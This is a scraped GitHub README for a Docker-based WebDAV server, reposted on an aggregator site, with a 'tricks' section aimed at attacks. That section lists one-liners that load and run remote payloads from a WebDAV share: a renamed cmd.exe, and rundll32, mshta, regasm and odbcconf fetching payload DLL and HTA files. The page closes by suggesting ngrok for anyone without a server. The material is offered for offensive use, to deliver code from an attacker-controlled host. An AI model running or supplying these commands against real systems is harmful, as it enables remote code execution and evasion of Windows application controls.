GitHub - Ridter/WebDAV: Set Up WebDAV Server for Remote File Sharing and more
2019-08-22 19:34:57 Author: github.com(查看原文) 阅读量:209 收藏

Join GitHub today

GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.

Sign up

Set Up WebDAV Server for Remote File Sharing and more

Shell Dockerfile

Usage

Build:

chmod+x build.sh
.\build.sh

Start server:

chmod +x start.sh
.\start.sh 8080

Example

Just put the file in share folder.

UNC PATH

\\server@port\folder
\\server@SSL@port\folder

Some tricks

\\server@port\folder\cmd.exe /c whoami

You can rename cmd.exe to any name you want, example:cmd.txt

More?

rundll32 \\webdavserver\folder\payload.dll
mshta \\webdavserver\folder\payload.hta
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
...

No VPS?

Try ngrok..


文章来源: https://github.com/Ridter/WebDAV
如有侵权请联系:admin#unsafe.sh